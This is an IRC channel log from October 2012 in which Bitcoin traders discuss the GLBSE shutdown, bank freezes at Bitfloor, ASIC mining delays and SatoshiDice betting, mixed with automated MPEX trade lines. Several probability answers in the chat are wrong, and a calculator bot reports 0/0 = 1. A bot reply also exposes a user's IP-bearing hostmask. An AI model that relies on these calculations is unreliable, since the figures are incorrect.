sarcasm included - thats a real question Oct 11 16:36:38 like.. make sure they keep the offline wallet key used to store everyone's bitcoins secret and don't check it into git Oct 11 16:37:09 totally for that - thats not really regulation ... not in the true sense though ... its some form of compliance to a satandard Oct 11 16:37:11 MrTiggr: ever use SSL? the CAs are exactly like that Oct 11 16:37:28 just companies that have a vested intrest in being secure authorities Oct 11 16:37:32 ok so we setup Bitcoin-Verisign then ? Oct 11 16:37:38 well, something like that Oct 11 16:37:41 someone should Oct 11 16:37:45 not an entirely bad idea Oct 11 16:37:49 but i don't know if it would be profitable Oct 11 16:37:54 iz that'd be mpex. Oct 11 16:37:57 i wudnt classify that as typical regulation though Oct 11 16:38:00 oh, nice Oct 11 16:38:11 yeah, i figured someone would try to do something like that Oct 11 16:38:15 and ++ mircea_popescu Oct 11 16:38:40 course, people bitch and moan. but slowly & surely. Oct 11 16:39:22 okay breakfast time for me.. peace all Oct 11 16:40:33 peace bro! ... don't hate my devil's-advocate hat oo much ... im kinda cranky today :P Oct 11 16:46:00 [MPEX] [S.MPOE] 47600 @ 0.00031003 = 14.7574 BTC [-] Oct 11 16:46:02 [MPEX] [S.MPOE] 28400 @ 0.00030983 = 8.7992 BTC [-] Oct 11 16:49:42 *yawn* morning Oct 11 16:49:50 did nefario actually "give out" assets/btc yet? Oct 11 16:54:56 not afaik Oct 11 16:55:56 [MPEX] [O.BTCUSD.P140T] 266 @ 0.25780139 = 68.5752 BTC [+] Oct 11 16:55:57 [MPEX] [O.BTCUSD.P140T] 183 @ 0.27932903 = 51.1172 BTC [+] **** BEGIN LOGGING AT Thu Oct 11 22:14:04 2012 Oct 11 22:23:43 [MPEX] [S.MPOE] 13600 @ 0.00030995 = 4.2153 BTC [+] Oct 11 22:48:51 There's no drama like Bitcoin drama. The "will pirate make contact" storyline returns tomorrow and the new season of "will BFL deliver" starts in a couple of weeks. It's like reality TV without the ads. Which well-known Bitcoin business will suddenly fail next? Who should be voted off the libertarian island? Oct 11 22:48:54 ahah so true. Oct 11 22:49:15 boner Oct 11 22:49:46 [MPEX] [S.MPOE] 9302 @ 0.00031179 = 2.9003 BTC [+] Oct 11 22:52:14 https://bitcointalk.org/index.php?topic=114820.msg1264442#msg1264442 also seems usagi ragequit ? Oct 11 22:58:03 so is bitfloor fucked v2.0 ? Oct 11 23:00:58 again? Oct 11 23:01:45 well seems they lost chase acct Oct 11 23:01:57 so this'd be banking not tech. Oct 11 23:10:57 mircea_popescu: Lost chase and wells fargo (well, no deposits, no ach withdraw .. .. through end of Oct, though if he doesn't know why they froze it how does he know end of Oct. it will be re-opened, with access to funds?) Oct 11 23:11:13 o wow both ? Oct 11 23:11:52 well that's ok, he makes a third coming, this time with a frozen BTC and a frozen USD balance. Oct 11 23:12:25 "WellsFargo cash deposits are currently suspended. We apologize for any inconvenience and are looking for a resolution." Oct 11 23:12:26 https://twitter.com/bitfloor/status/256122628471930881 Oct 11 23:12:42 "business reasons" with no explanation. Oct 11 23:12:48 you know... it's almost as if the banks are by now workingtogether to fuck over btc exchanges Oct 11 23:12:53 https://twitter.com/bitfloor/status/256125151823941634 Oct 11 23:12:55 possibly the worst business to be in. Oct 11 23:13:25 Yup, and they have an excuse that sounds legit. "Just because, um ... we can't tell you why." Oct 11 23:13:40 well frankly, they're entirely within their right to tell you to take a hike. Oct 11 23:13:48 it's a bank after all, it's not obliged to handle your money. Oct 11 23:14:06 Until I can legally open a bank then that is bullshit. Oct 11 23:14:15 you can. Oct 11 23:14:18 you just need a lot of money. Oct 11 23:14:23 Bullshit Oct 11 23:14:26 what ? Oct 11 23:15:02 all is not well in magical bunny land Oct 11 23:15:03 i'm serious tho, come to romania and open a bank. you need something like 50ish mn in capital iirc. Oct 11 23:15:53 [MPEX] [S.MPOE] 12798 @ 0.0003126 = 4.0007 BTC [+] Oct 11 23:15:57 i'd rather open a mcdonalds Oct 11 23:16:20 How long would take mpex to open his own bank? Oct 11 23:16:24 :) Oct 11 23:17:16 pigeons: for that you need garbage amounting in the millions Oct 11 23:17:27 Right, wasn't calling bullshit on that you need money to open a bank. Was trying to say how that moeny requirement is bullshit. Oct 11 23:17:35 rdponticelli i don't want a bank tho. Oct 11 23:17:54 sgornick why would it be bullshit tho ? i mean... allow nefario to open an irl bank ? Oct 11 23:18:19 money as a barrier to entry is great, because in spite of all its failings, modern society works pretty well at keeping idiots and money apart. Oct 11 23:18:31 people wouldn't use nefario if there were legal alternatives competent people would run them Oct 11 23:18:36 mircea_popescu: damn, I won't buy anymore S.MPOE, then Oct 11 23:18:41 pigeons right. like... you know... btc stock exchanges. Oct 11 23:18:49 I thought we was building a bank Oct 11 23:18:49 xD Oct 11 23:18:50 you're flat out wrong. the incompetent flock together. Oct 11 23:19:14 rdponticelli banks suck, the margins are about as narrow as in electricity production. Oct 11 23:19:15 or at least they hire likeminded people to post for them on forums Oct 11 23:19:50 no, in general they do it themselves. Oct 11 23:20:07 and the honesty of their incompetence resonates with the inner vibration of incompetence in a large mass of others. Oct 11 23:20:18 that's deep Oct 11 23:20:40 and it has vibrations! Oct 11 23:21:40 but incidentally, why are there mcdonald's places, pigeons ? after all, there's legal alternatives run by competent people. like, you know, actual restaurants. Oct 11 23:21:51 chez asshole. Oct 11 23:22:05 i mean alphonse. chez alphonse. Oct 11 23:23:14 what are the legal alternatives to banks? Oct 11 23:23:40 there aren't. join the cartel or else use nefario Oct 11 23:24:12 "the cartel" ? Oct 11 23:24:32 .wik cartel Oct 11 23:24:33 "A cartel is a formal agreement among competing firms." - http://en.wikipedia.org/wiki/Cartel Oct 11 23:24:44 there's no banking cartel wtf. Oct 11 23:25:44 but there can be a bitcoin cartel Oct 11 23:25:46 mircea_popescu: When fractional reserve is 10:1 that's when the system fails without a large amount of capital (and generally fails even with a large amount of capital) Oct 11 23:26:00 But here's an approach where I need only $1 to do this. Oct 11 23:26:01 http://market-ticker.org/akcs-www?post=209282 Oct 11 23:27:02 sgornick well that's two arguments you're proposing, and they're unrelated. anyway, there's no practical way to limit credit. Oct 11 23:27:14 if i promise my gf to take her to the film, it's none of your business. Oct 11 23:27:22 credit arises naturally. Oct 11 23:27:38 arf, give me my bitcoins, GLBSE! Oct 11 23:27:44 BTC-Mining shoe on head ? Oct 11 23:27:56 no shoe on head... Oct 11 23:28:08 aww Oct 11 23:28:10 It seems the AML docs requirement was removed Oct 11 23:28:24 i saw. isn't this great, policy by shoestring ? Oct 11 23:28:57 and when i say glbse is damaging, this is EXACTLY what i mean. will in the future people go "o, i won't follow stated policy cause what if these people reverse it like glbse used to do" ? yes, they will. Oct 11 23:29:11 the false notion that glbse was a btc-financials related website is fucking us over ;/ Oct 11 23:31:09 jurov: in the orderform of coinbr it would be nice if the item selectbox would have a consistent ordering Oct 11 23:41:24 [MPEX] [S.MPOE] 30000 @ 0.0003112 = 9.336 BTC [-] Oct 11 23:47:28 [16:29] the false notion that glbse was a btc-financials related website is fucking us over Oct 11 23:48:35 yes, this is dog. Oct 11 23:48:59 Well it could have been, but Nefario screwed it up. He should have accepted brokering unregistered securities might not be legal and stayed in China. Lower costs of living to top it. Oct 11 23:49:44 Instead of backing up for unknown reasons (theft, fears, whatever) Oct 11 23:50:01 it surely could have been. Oct 11 23:50:28 back when he was still in China I honestly thought that's where he's going and mostly why I laid off him Oct 11 23:50:34 (that and a bunch of people vouching) Oct 11 23:52:24 You need some dedication when offering bitcoin services. Oct 11 23:53:03 In any case, I'm off. Don't know why I've been paying 26$/month for TV I'm not using when I watch my shows online. Oct 11 23:53:05 "some". Oct 11 23:53:16 i'd say it's easier to have children. Oct 11 23:53:21 http://www.youtube.com/watch?v=On0r-7XGf0U << is this chick high ? Oct 11 23:53:35 Got to return a terminal eh Oct 11 23:57:41 its atlas Oct 11 23:58:15 who is ? Oct 11 23:58:25 that stoned girl Oct 11 23:59:01 pic related http://media.reason.com/mc/mriggs/2012_10/40Years0fDrugWarFailure.jpg Oct 11 23:59:38 heh yea. Oct 12 00:00:18 in other news Tim O'reilly is a toker Oct 12 00:06:25 [MPEX] [S.MPOE] 5700 @ 0.0003112 = 1.7738 BTC [-] Oct 12 00:06:26 [MPEX] [S.MPOE] 2700 @ 0.00031094 = 0.8395 BTC [-] Oct 12 00:06:27 [MPEX] [S.MPOE] 18900 @ 0.0003107 = 5.8722 BTC [-] Oct 12 00:08:53 jeez, being sure you have legal shit together takes too long Oct 12 00:15:52 smickles: Yeah, the legal system is just a hierarchy sustainer, and those already stablished don't tend to like the future competition Oct 12 00:17:20 hm Oct 12 00:17:29 i need to get all the trades from gox since begining of time Oct 12 00:17:38 yours or everyone's ? Oct 12 00:17:43 everyones. Oct 12 00:18:06 hm Oct 12 00:20:16 o, here they are http://cahier2.ww7.be/bitcoinmirror/phantomcircuit/ Oct 12 00:20:29 that dude is still useful for something Oct 12 00:20:40 grab it now, you know theres no backup Oct 12 00:20:44 :D Oct 12 00:20:59 iirc bitcoincharts had a copy somewhere Oct 12 00:22:56 [MPEX] [S.MPOE] 3000 @ 0.00031238 = 0.9371 BTC [+] Oct 12 00:24:25 [MPEX] [S.MPOE] 25000 @ 0.00031238 = 7.8095 BTC [+] Oct 12 00:49:34 http://theweek.com/article/index/234470/13-little-known-punctuation-marks-we-should-be-using Oct 12 00:50:46 [MPEX] [S.MPOE] 9300 @ 0.0003107 = 2.8895 BTC [-] Oct 12 00:50:47 [MPEX] [S.MPOE] 15604 @ 0.00031012 = 4.8391 BTC [-] Oct 12 01:01:51 FabianB,yes, whole order form is FUBAR. But finally i figured toscawidgets out and am redoing it right atm. Oct 12 01:12:48 i've now written a draft of a couple lines of recitals for a contract involving bitcoin transfers which i enjoy Oct 12 01:12:51 Over the course of their adventures, smickles has acquired control over an amount of [thing] and [otherguy] has acquired control over an amount of [otherthing]. Oct 12 01:12:54 So, it has come to this, that smickles is willing to part with an amount of [thing] in order to acquire control over an amount of [otherthing]. Likewise, [otherguy] is now willing to part with an amount of [otherthing] in order to acquire control over an amount of [thing]. Oct 12 01:15:22 [MPEX] [O.BTCUSD.P200N] 1 @ 0.99879214 BTC [-] Oct 12 01:15:37 smickles, consider writing recitals for hire Oct 12 01:16:31 [MPEX] [O.BTCUSD.P200N] 1 @ 0.89865703 BTC [-] Oct 12 01:16:32 jurov: i will provide consulting services as part of my business ;D Oct 12 01:17:25 i'd prefer something short and simple like "smickles accidentally an amount of [thing] in order to [otherthing]" Oct 12 01:17:43 ;;calc (20-[ticker --bid])/[ticker --bid]-.99879214 Oct 12 01:17:44 Error: Something in there wasn't a valid number. Oct 12 01:17:58 ;;calc (20 - [ticker --bid]) / [ticker --bid] - .99879214 Oct 12 01:17:59 -0.332125473333 Oct 12 01:19:37 jurov: lol, i feel like making the recitals out of a 'realization keanu' image Oct 12 01:20:52 or, even shorter, "smickles wants moar [thing]. Likewise, [otherguy] can haz [otherthing]." Oct 12 01:21:46 :D Oct 12 01:21:46 and you can use cat pics! keanu is boring Oct 12 01:22:06 "under the eye of ceiling cat" Oct 12 01:24:43 "Delivery method: [ ] Fedex [ ] UPS [ ] Monorail cat" Oct 12 01:27:36 and it has to end with "best contract evar" Oct 12 01:33:46 i used lolcat translator, brace ur: Oct 12 01:33:49 SO, IT HAS COME 2 DIS, DAT SMICKLEZ IZ WILLIN 2 PART WIF AN AMOUNT OV [TING] IN ORDR 2 ACQUIRE CONTROL OVAR AN AMOUNT OV [OTHERTHIN]. LIKEWIZE, [OTHERGUY] IZ NAO WILLIN 2 PART WIF AN AMOUNT OV [OTHERTHIN] IN ORDR 2 ACQUIRE CONTROL OVAR AN AMOUNT OV [TING]. Oct 12 01:34:02 lmaooooo Oct 12 01:37:47 lol Oct 12 01:42:44 [MPEX] [S.MPOE] 4637 @ 0.00031238 = 1.4485 BTC [+] Oct 12 02:01:26 [MPEX] [O.BTCUSD.P170N] 1 @ 0.58521108 BTC [-] Oct 12 02:13:35 [MPEX] [O.BTCUSD.P170T] 1 @ 0.46103591 BTC [+] Oct 12 02:21:15 [MPEX] [O.BTCUSD.P110T] 3 @ 0.08997437 = 0.2699 BTC [-] Oct 12 02:46:21 [MPEX] [S.MPOE] 21200 @ 0.00031051 = 6.5828 BTC [-] Oct 12 03:11:46 [MPEX] [S.MPOE] 13365 @ 0.00031238 = 4.175 BTC [+] Oct 12 03:11:48 [MPEX] [S.MPOE] 28425 @ 0.00031307 = 8.899 BTC [+] Oct 12 03:39:27 [MPEX] [S.MPOE] 5900 @ 0.00031264 = 1.8446 BTC [-] Oct 12 03:56:35 quiet in here today Oct 12 04:05:15 [MPEX] [S.MPOE] 34758 @ 0.00031264 = 10.8667 BTC [-] Oct 12 04:11:38 prolly not the best time I could've been on a vacation... Oct 12 04:28:57 ;;eauth thestringpuller Oct 12 04:28:58 Request successful for user thestringpuller, hostmask thestringpuller!~leflor@99-39-98-185.lightspeed.tukrga.sbcglobal.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/0FF2943DA179E169 Oct 12 04:30:31 [MPEX] [S.MPOE] 4519 @ 0.00031109 = 1.4058 BTC [-] Oct 12 04:32:42 ;;gpg verify freenode:#bitcoin-otc:69eaf57f6336b2ca03141dcfc6bb3c41918a39d23bf42c504c512155 Oct 12 04:32:42 Error: 'freenode:#bitcoin-otc:69eaf57f6336b2ca03141dcfc6bb3c41918a39d23bf42c504c512155' is not a valid http url. Oct 12 04:34:01 ;;gpg everify freenode:#bitcoin-otc:69eaf57f6336b2ca03141dcfc6bb3c41918a39d23bf42c504c512155 Oct 12 04:34:02 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu Oct 12 04:34:21 ;;gpg everify freenode:#bitcoin-otc:69eaf57f6336b2ca03141dcfc6bb3c41918a39d23bf42c504c512155 Oct 12 04:34:22 You are now authenticated for user thestringpuller with key 0FF2943DA179E169 Oct 12 04:34:29 :P Oct 12 04:43:12 ;;seen usagi Oct 12 04:43:13 usagi was last seen in #bitcoin-assets 6 days, 18 hours, 29 minutes, and 30 seconds ago: We own 2000 shares.. should be good if glbse comes up :/ Oct 12 04:50:29 o hey, i just got my glbse btc back. Oct 12 04:50:39 it was tucked away in the pirate oct 12 payment. Oct 12 04:53:48 spose I should get around to claiming Oct 12 04:54:22 purely because I don't want that fuckmeat keepign the 1.4btc or whatever I have in there Oct 12 04:54:55 and of course to claim that 1 DMC share Oct 12 04:55:37 totally worth it. Oct 12 04:56:26 [MPEX] [S.MPOE] 22700 @ 0.00031084 = 7.0561 BTC [-] Oct 12 04:56:27 [MPEX] [S.MPOE] 896 @ 0.00031051 = 0.2782 BTC [-] **** BEGIN LOGGING AT Fri Oct 12 15:04:59 2012 Oct 12 15:08:41 [MPEX] [S.MPOE] 13100 @ 0.00031274 = 4.0969 BTC [+] Oct 12 15:26:44 http://i.imgur.com/YRDzn.png Oct 12 15:33:51 [MPEX] [S.MPOE] 22800 @ 0.00031358 = 7.1496 BTC [+] Oct 12 15:37:13 soh, i parsed entire gox history Oct 12 15:37:17 3mio records Oct 12 15:37:51 not too shabby Oct 12 15:45:09 yeah Oct 12 15:46:28 im going to chart money flow oscilator Oct 12 16:00:15 [MPEX] [S.MPOE] 27016 @ 0.00031274 = 8.449 BTC [-] Oct 12 16:00:16 [MPEX] [S.MPOE] 2300 @ 0.00031231 = 0.7183 BTC [-] Oct 12 16:14:22 kakobrekla fun Oct 12 16:18:36 [MPEX] [O.BTCUSD.C100T] 4 @ 0.22374807 = 0.895 BTC [-] Oct 12 16:18:37 [MPEX] [O.BTCUSD.C100T] 5 @ 0.21399737 = 1.07 BTC [-] Oct 12 16:18:39 [MPEX] [O.BTCUSD.C100T] 2 @ 0.19049152 = 0.381 BTC [-] Oct 12 16:18:40 [MPEX] [O.BTCUSD.C100T] 2 @ 0.18103774 = 0.3621 BTC [-] Oct 12 16:18:41 [MPEX] [O.BTCUSD.C100T] 837 @ 0.17063486 = 142.8214 BTC [-] Oct 12 16:30:52 http://i.imgur.com/yU7bA.gif Oct 12 16:38:28 someone should make a new ponzi on bite.me Oct 12 16:38:49 iv made 15 btc off of satishi dice... Oct 12 16:38:54 first time playing Oct 12 16:38:58 crazy adictive Oct 12 16:39:16 you know, playing sdice is -er, owning stock is +er. Oct 12 16:43:59 any thing that requires luck I lose Oct 12 16:44:02 [MPEX] [S.MPOE] 17900 @ 0.00031116 = 5.5698 BTC [-] Oct 12 16:44:36 lol 30 btc to get an account? you know i turned you down when it was free Oct 12 16:44:42 also i think i would lose more holding the stock anyway Oct 12 16:44:44 id short it... Oct 12 17:04:12 the problem with this game is confrims Oct 12 17:04:21 im up 19 coins but cant play more but want to Oct 12 17:04:52 oh i just have to wait for 1 confirm not 6 Oct 12 17:04:55 okay this is fine Oct 12 17:09:14 [MPEX] [S.MPOE] 23887 @ 0.000311 = 7.4289 BTC [-] Oct 12 17:09:15 [MPEX] [S.MPOE] 20723 @ 0.00031058 = 6.4361 BTC [-] Oct 12 17:09:18 ;;tslb Oct 12 17:09:21 Time since last block: 2 minutes and 37 seconds Oct 12 17:12:21 and some blocks do that have sd tx in them Oct 12 17:12:32 do not have even Oct 12 17:19:09 yeah mine are not being added Oct 12 17:20:19 you guy better get the LTC before it hits 0.009 Oct 12 17:20:40 diff jump estimate is about 45%! yes 45% Oct 12 17:24:36 im well over 160k so i guess ill have to hold Oct 12 17:24:43 i wanted 200k but i guess i ownt get it :( Oct 12 17:34:18 [MPEX] [S.MPOE] 29377 @ 0.00031058 = 9.1239 BTC [-] Oct 12 17:34:20 [MPEX] [S.MPOE] 1074 @ 0.00030923 = 0.3321 BTC [-] Oct 12 17:34:21 [MPEX] [S.MPOE] 14649 @ 0.0003092 = 4.5295 BTC [-] Oct 12 17:36:01 hmm s dice did not tell me about a 2 btc bet Oct 12 17:36:09 it jsut ignored it but took my money :/ Oct 12 17:40:37 oh it just took a while Oct 12 17:59:43 [MPEX] [S.MPOE] 6451 @ 0.0003092 = 1.9946 BTC [-] Oct 12 17:59:45 [MPEX] [S.MPOE] 32549 @ 0.00030918 = 10.0635 BTC [-] Oct 12 18:07:26 Giga Oct 12 18:07:44 hello Oct 12 18:08:33 hi Oct 12 18:08:47 How you guys doin? Oct 12 18:08:52 Glad it is friday? Oct 12 18:09:53 glbse has pretty much ruined any entire market, it's kind of hard to understand the effect of just shutting down their service without any notice Oct 12 18:09:58 an* Oct 12 18:10:25 it's beyond a worst case scenario Oct 12 18:13:45 For a public market Oct 12 18:13:53 You are forced to reprivatizr Oct 12 18:14:03 Instead of public trading Oct 12 18:14:21 also doesnt mpex have more market depth? Oct 12 18:15:07 gigavps, you also seem to be able to withstand the weather of this storm your company won't buckle Oct 12 18:16:21 thepulledstring i can survive anything, i am more worried about people who bought shares/bonds Oct 12 18:16:43 glbse has let down their entire userbase with yet another knee jerk reaction Oct 12 18:25:28 [MPEX] [S.MPOE] 4151 @ 0.00030918 = 1.2834 BTC [-] Oct 12 18:25:29 [MPEX] [S.MPOE] 47549 @ 0.00030915 = 14.6998 BTC [-] Oct 12 18:35:11 at least it had better css. Oct 12 18:38:36 Mpex is for unix users Oct 12 18:38:41 unf Oct 12 18:39:34 damn all that ASIC money still be dumped by the ASIC folk to buy fiat to build thier ASICS holding price down maybe? Oct 12 18:39:52 gigavps when you get a list of your outstanding shares and who owns them you will be able to hunt out your shareholders who haven't made claims... Oct 12 18:40:51 knotwork: ork I think asic are all hype. So much money goes into NRE Oct 12 18:50:36 [MPEX] [S.MPOE] 1900 @ 0.00030915 = 0.5874 BTC [-] Oct 12 19:16:08 [MPEX] [S.MPOE] 27300 @ 0.00031116 = 8.4947 BTC [+] Oct 12 19:33:22 Hey I think I saw something about google's browser having a remote desktop / pc-anywhere feature in it now Oct 12 19:34:15 if so people who insist everything has to be in their browser can be accomodated simply by leasing them a virtual machine running chrome with the remote desktop feature turned on Oct 12 19:34:28 they they can have desktop apps in their browser Oct 12 19:38:04 chrome sucks. You can not select individual cells from a table. Oct 12 19:38:46 its suppoosedly a remote desktop Oct 12 19:39:07 dont know if the remote machine even has to run chrome or it runs a normal remote desk daemon Oct 12 19:39:43 no no HTML tables to worry about, its like running xwindows presumably but embedded in their browser Oct 12 19:40:32 so they could e.g. run open transactoions java client on their virtual machine and have it in their browser at their end Oct 12 19:41:33 [MPEX] [S.MPOE] 6100 @ 0.00030915 = 1.8858 BTC [-] Oct 12 19:45:43 I think the browser thing is "misery loves company". if private keys are only at their end, not even an intrusive javascript at server to come into their browser to mess with their keys, if they get hacked its just them suffering alone Oct 12 19:46:21 but if they convince someone to create a website to get hacked, then when the hack happens they have to consolation of everyonev else also suffering along with them Oct 12 19:47:51 and they can claim it wasnt their fault too, as if they didnt insist and lobby etc for a website precisely to let it happen Oct 12 19:51:58 can someone help my figure something out, what are the odds of my not rolling a 1 on a 4 side dice if i do it 10 times? and never hit a 1? Oct 12 19:52:38 .calc(0.25**10) Oct 12 19:53:13 oh no it NOT rolling 1 Oct 12 19:53:17 .calc(0.75**10) Oct 12 19:53:22 .calc(0.75^10) Oct 12 19:53:26 whatever Oct 12 19:53:34 0.05631351470947265625 Oct 12 19:53:45 so that will happen 5 times in 100? Oct 12 19:54:59 yes, i think so Oct 12 19:55:38 ;;calc(0/0) Oct 12 19:55:38 Error: "calc(0/0)" is not a valid command. Oct 12 19:55:44 how does it work? Oct 12 19:56:06 .calc 0/0 Oct 12 19:56:07 0/0 = 1 Oct 12 19:56:08 Note that .calc is deprecated, consider using .c Oct 12 19:56:22 0/0=1 fuck yeah Oct 12 19:57:18 is today the 12th when The BTC Shysters and Thieves (aka BTCST) promised to release new information? Oct 12 19:58:46 nope. wrong month Oct 12 20:02:48 Wrong century Oct 12 20:06:39 [MPEX] [S.MPOE] 21830 @ 0.00030915 = 6.7487 BTC [-] Oct 12 20:06:40 [MPEX] [S.MPOE] 57549 @ 0.00030912 = 17.7895 BTC [-] Oct 12 20:31:58 [MPEX] [S.BVPS] 300 @ 0.00323914 = 0.9717 BTC [+] Oct 12 20:57:08 [MPEX] [S.MPOE] 28674 @ 0.00030963 = 8.8783 BTC [+] Oct 12 21:19:07 ;;tlsb Oct 12 21:19:07 Error: "tlsb" is not a valid command. Oct 12 21:19:16 ;;tslb Oct 12 21:19:22 Time since last block: 19 minutes and 34 seconds Oct 12 21:22:33 [MPEX] [S.MPOE] 4348 @ 0.00030912 = 1.3441 BTC [-] Oct 12 21:41:59 the fuck Oct 12 21:43:22 is ozcoin down Oct 12 21:46:35 Ozcoin is never down Oct 12 21:47:51 [MPEX] [S.BVPS] 100 @ 0.00323967 = 0.324 BTC [+] Oct 12 21:48:36 dub: why is dubserv down Oct 12 21:48:58 gigavps returns Oct 12 21:50:12 is it abird? is it a plain? no, its gigavps Oct 12 21:50:26 PsychoticBoy lol Oct 12 21:50:30 i invested in you Oct 12 21:50:48 When you first ipo'ed Oct 12 21:50:59 I do hope i will get all shareholders information so I can settle this Oct 12 21:51:10 ABM or FDBF? Oct 12 21:51:16 ABM Oct 12 21:51:24 long time ago Oct 12 21:51:27 How long did it take you to.get your single Oct 12 21:51:30 the good times Oct 12 21:51:44 i am more interested in your interaction with bfl Oct 12 21:52:02 I ordered in Jan 2012 and got it 11 april 2012 Oct 12 21:52:21 damn you still think its that long of a wait? Oct 12 21:52:30 now? Oct 12 21:52:35 My investors want to drop money on singles Oct 12 21:52:37 yea now Oct 12 21:52:39 no now you will get it in 40 days Oct 12 21:53:40 https://bitcointalk.org/index.php?topic=77796.0 Oct 12 21:54:10 last one got it in 30 days Oct 12 21:54:15 ;;tslb Oct 12 21:54:17 Time since last block: 13 minutes and 30 seconds Oct 12 21:54:22 30 days damn thats so long Oct 12 21:54:39 i could build an fpga more quickly Oct 12 21:55:03 Too bad bfl's bitstream is locked down. Oct 12 21:55:35 PsychoticBoy do you think they will have hell shipping the asics given the wait times with the singles? Oct 12 21:56:08 First let us all wait and see IF they will ship any asics Oct 12 21:56:12 ;;verify thestringpuller Oct 12 21:56:12 Error: 'thestringpuller' is not a valid http url. Oct 12 21:56:50 If? Oct 12 21:57:18 yes IF Oct 12 21:57:34 I mean I know asic's are expensive to produce due to the NRE and the quantity needed to make it worthwhile. Oct 12 21:57:58 I have lots of preorders with them but heey anything can happen in btcworld Oct 12 21:58:10 My cost estimates for an asic based off of fpgaminer was about 500k for a batch Oct 12 21:58:54 I worked in a microelectronics fabrication lab at Georgia Tech as an undergrad. Oct 12 21:59:00 They should have enough to create the asics, I can only hope they will Oct 12 21:59:05 Its hella expensive. Oct 12 21:59:31 Expensive design wise. The acual fabrication is cheap hence the cost of the NRE. Oct 12 22:00:32 I was just wondering your situation PsychoticBoy since I want to go into mining full time but dont want to get buttfucked when asics come out. Oct 12 22:01:18 No one can tell, you have to take the risk A to buy a mining device now or B preorder asics Oct 12 22:01:24 ;;tslb Oct 12 22:01:26 Time since last block: 20 minutes and 40 seconds Oct 12 22:01:53 Or i build my own. Oct 12 22:02:05 :D that would be the best option Oct 12 22:02:25 Which is doable if you have the right bitstream and people willing to solder for you. Oct 12 22:02:35 Fuck. I hate bfl Oct 12 22:02:48 I hate bfl more than glbse. Oct 12 22:02:52 lol Oct 12 22:03:07 This is some elqborate con... Oct 12 22:03:26 Elaborate. Sorry for the typos I am using my phone to irc. Oct 12 22:04:47 PsychoticBoy, what was you roi time frame for the one single. I had you at 40+ weeks for full roi on the equipment based on our electricity costs over there in the netherlands. Oct 12 22:09:08 about 40 weeks brb Oct 12 22:13:05 [MPEX] [S.MPOE] 24526 @ 0.00030963 = 7.594 BTC [+] Oct 12 22:16:19 http://video.disney.com/watch/partysaurus-rex-4cb5aeaed8df6adddc0f952d Oct 12 22:16:22 so fucking tripping Oct 12 22:36:04 BTCST = BTC Shysters & Thieves Oct 12 22:38:15 [MPEX] [S.MPOE] 43645 @ 0.00031092 = 13.5701 BTC [+] Oct 12 22:38:16 [MPEX] [S.MPOE] 6903 @ 0.00030912 = 2.1339 BTC [-] Oct 12 22:38:17 [MPEX] [S.MPOE] 5500 @ 0.00030906 = 1.6998 BTC [-] Oct 12 22:38:18 [MPEX] [S.MPOE] 23152 @ 0.00030903 = 7.1547 BTC [-] Oct 12 22:39:58 ozcoin is down :/ Oct 12 22:40:34 yup it is :< Oct 12 22:52:08 Diablo miner Oct 12 23:00:15 [MPEX] [O.BTCUSD.C110T] 3 @ 0.14522402 = 0.4357 BTC [-] Oct 12 23:01:49 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.12583524 = 125.8352 BTC [-] Oct 12 23:09:33 im failing at probibility Oct 12 23:09:43 lol Oct 12 23:09:50 lets say my odds are 1 in 4 and i miss it my first time Oct 12 23:10:05 what are the odds that i hit it the second time? Oct 12 23:10:14 is it just .25 x .25 ? Oct 12 23:10:30 that is the odds i miss it twicer right? Oct 12 23:10:45 im trying to figure out the odds i miss it the first time but hit it the second time Oct 12 23:11:16 1:4 only work for the first one Oct 12 23:11:32 it doesn't change Oct 12 23:11:39 you are missing the point Oct 12 23:11:55 waht are the odds i miss it the first time but hit it the second time? Oct 12 23:12:25 and what are the odds i miss it 3 times in a row and then hit its the 4th time Oct 12 23:12:37 you cant tell me its 1:4 everytime or i will be well over 100% before long... Oct 12 23:13:27 facepalm Oct 12 23:13:47 youdont understand the question Oct 12 23:14:43 the odds of me missing the 1 out of 4 if i try 15 times should be 25 to the power of 15 Oct 12 23:15:36 so waht are the odds of my hitting it on the 16th time assuming we dont know if i will hit it on the first 15 times or not and trust me it is not 1:4 Oct 12 23:16:05 the odds of me failing to hit it 15 times in a row is so far less than 1;4 Oct 12 23:16:21 what are the odds i even make it to the 16th roll? Oct 12 23:16:42 ... Oct 12 23:17:10 at least you didnot say 1:4 again... Oct 12 23:18:20 i dont know why i even bother talking with you... Oct 12 23:19:16 its gota be .75 x .25 Oct 12 23:27:13 [MPEX] [S.MPOE] 13100 @ 0.00030903 = 4.0483 BTC [-] Oct 12 23:31:47 infomercia: Mos reliable BTC legal advice is given out by "Shystersberg, Schmuckman & Gonif" law firm. Located in NY Diamond District Oct 12 23:53:10 [MPEX] [S.MPOE] 16341 @ 0.00030903 = 5.0499 BTC [-] Oct 12 23:53:11 [MPEX] [S.MPOE] 16500 @ 0.000309 = 5.0985 BTC [-] Oct 12 23:53:12 [MPEX] [S.MPOE] 24059 @ 0.000309 = 7.4342 BTC [-] Oct 13 00:18:57 [MPEX] [S.MPOE] 64300 @ 0.00030939 = 19.8938 BTC [+] Oct 13 00:18:58 [MPEX] [S.MPOE] 784 @ 0.00031116 = 0.2439 BTC [+] Oct 13 00:19:00 [MPEX] [S.MPOE] 216 @ 0.00031263 = 0.0675 BTC [+] Oct 13 00:44:12 [MPEX] [S.MPOE] 5300 @ 0.0003126 = 1.6568 BTC [-] Oct 13 01:09:52 [MPEX] [S.MPOE] 10200 @ 0.0003126 = 3.1885 BTC [-] Oct 13 01:09:53 [MPEX] [S.MPOE] 15400 @ 0.00031027 = 4.7782 BTC [-] Oct 13 01:11:47 Chaang-Noi look into hospital. Oct 13 01:12:15 but anyway, odds to miss twice in a row are 1/4. odds to hit one miss the other are 1/2 Oct 13 01:12:22 odds to miss first hit 2nd are 1/4 Oct 13 01:15:32 ~commercial break~ Oct 13 01:15:35 CoinBr.com will be officially announced on Monday. But registration is laready open, so it' your chance to get your invitation code and start earning commissions! Oct 13 01:15:47 *already Oct 13 01:15:56 need to hire a copywriter Oct 13 01:25:35 aye,goodnight Oct 13 01:36:15 [MPEX] [S.MPOE] 63100 @ 0.00031106 = 19.6279 BTC [+] Oct 13 02:01:46 [MPEX] [S.MPOE] 7300 @ 0.00031163 = 2.2749 BTC [+] Oct 13 02:01:48 [MPEX] [S.MPOE] 42800 @ 0.00031027 = 13.2796 BTC [-] Oct 13 